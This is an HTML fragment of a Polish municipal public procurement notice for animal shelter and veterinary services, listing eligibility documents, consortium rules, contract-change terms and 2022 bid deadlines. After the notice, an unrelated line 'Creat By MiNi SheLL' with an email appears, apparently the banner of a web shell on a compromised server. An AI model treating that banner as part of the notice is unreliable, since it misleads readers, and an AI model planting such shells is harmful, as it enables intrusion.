<span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności<br/>do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokument potwierdzający, że Wykonawca jest wpisany do jednego z<br/>rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce<br/>zamieszkania, wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem.<br/>Zezwolenie, licencja, koncesja lub wpis do rejestru działalności regulowanej, tj.:<br/>Dot. cz. I<br/>- decyzja o wpisie schroniska dla zwierząt do rejestru podmiotów prowadzących<br/>działalność nadzorowaną prowadzonego przez Powiatowego Lekarza Weterynarii<br/>na obszarze jego właściwości;<br/>- wpis do ewidencji zakładów leczniczych dla zwierząt;<br/>- zezwolenie na prowadzenie działalności w zakresie prowadzenia schronisk dla<br/>bezdomnych zwierząt wydane w formie decyzji przez wójta , burmistrza lub prezydenta<br/>miasta właściwego ze względu na miejsce świadczenia usług.<br/>Dot. cz. II<br/>- wpis do ewidencji zakładów leczniczych dla zwierząt.<br/>Dot. cz. I oraz cz. II:<br/>- wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu<br/>wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami,<br/>- wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> PEŁNOMOCNICTWO do reprezentowania w postępowaniu o udzielenie zamówienia – w szczególności – do podpisania oferty wraz z załącznikami – o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę. ZOBOWIĄZANIE podmiotu udostępniającego zasoby do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jeśli Wykonawca polega na tych zasobach. OŚWIADCZENIE: Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę [art. 7 ust. 1 Ustawy z dnia 13<br/>kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022 poz. 835). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni złożyć pełnomocnictwo<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy, o ile nie wynika ono z innych dokumentów załączonych przez<br/>Wykonawcę, np. z umowy konsorcjum. 2. Pełnomocnictwo, o którym mowa w pkt. 1, powinno<br/>wskazywać wszystkich Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia<br/>publicznego, a także zawierać deklarację (podpisy) wszystkich mocodawców, co do<br/>ustanowienia pełnomocnika. 3. Spółka cywilna ubiegająca się o udzielenie zamówienia nie ma obowiązku powoływania pełnomocnika i może być reprezentowana przez wspólników - każdego wspólnika - na ogólnych zasadach reprezentacji spółki cywilnej, zgodnie z przepisami Kodeksu<br/>cywilnego, chyba że umowa lub uchwała wspólników stanowi odmiennie. 4. Jeżeli została<br/>wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy<br/>regulującej współpracę tych Wykonawców. [art. 59 PZP] W przypadku potwierdzenia spełnienia<br/>przez Wykonawcę wspólnie ubiegającego się o udzielenie zamówienia warunków dotyczących:<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia – Wykonawca ten winien złożyć oświadczenie w<br/>trybie art. 117 ust. 4 PZP <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy<br/>w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, odpowiednio<br/>do treści art. 455 ustawy Prawo zamówień publicznych, jak również zmian nieistotnych tj.<br/>takich, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie<br/>zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na<br/>wynik postępowania. 2. Zamawiający dopuszcza zmiany umowy w zakresie:<br/>1) wynikającym ze skutków zdarzeń spowodowanych siłą wyższą,<br/>2) przedmiotu umowy obejmującym zmiany stanu prawnego, który będzie wnosił nowe<br/>wymagania, co do sposobu realizacji jakiegokolwiek tematu ujętego przedmiotem<br/>zamówienia, jeśli nie będzie to związane ze zmianą zakresu i wartości przedmiotu<br/>zamówienia, 3) danych Wykonawcy, np. zmiana adresu, konta bankowego, nr Regon, osób<br/>kontaktowych, itp., 4) wynikłym z okoliczności, których przy zachowaniu należytej staranności nie można było przewidzieć w chwili zawierania umowy, w szczególności w przypadkach: istotnej<br/>zmiany na rynku walutowym, istotnej zmiany na rynku ekonomicznym, istotnej zmiany<br/>prawa - zmiany przepisów prawa, itp.<br/>3. Zmiany w zakresie innych postanowień mogą nastąpić tylko na podstawie<br/>obiektywnych przesłanek zaakceptowanych przez każdą Stronę umowy.<br/>4. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony<br/>protokół podpisany przez obie Strony.<br/>5. Zamawiający w uzgodnieniu z Wykonawcą dopuszcza zmianę poszczególnych<br/>zakresów umowy bez zmiany wysokości wynagrodzenia określonego w § 3 ust. 1.<br/>6. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający<br/>może wyrazić zgodę, ale nie stanowią jednocześnie zobowiązania Zamawiającego<br/>do wyrażenia takiej zgody.7. Wszelkie zmiany niniejszej umowy wymagają zachowania formy pisemnej-aneksu do umowy podpisanych przez Strony, pod rygorem nieważności.<br/>Do treści zawieranej umowy zostaną wprowadzone zapisy zgodnie z ustawą z dnia 7 października 2022 r. o zmianie niektórych ustaw w celu uproszczenia procedur administracyjnych dla obywateli i przedsiębiorców (Dz. U. poz. 2185), nowelizująca przepisy ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (art. 44 i 75 ustawy), a także wprowadzająca dodatkowe regulacje (art. 48 ustawy), w zakresie zmiany umowy w sprawie zamówienia publicznego, w tym waloryzacji wynagrodzenia wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-29 10:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/umz.zgierz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-29 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-27</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Wszystkie kryteria wymienione w SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com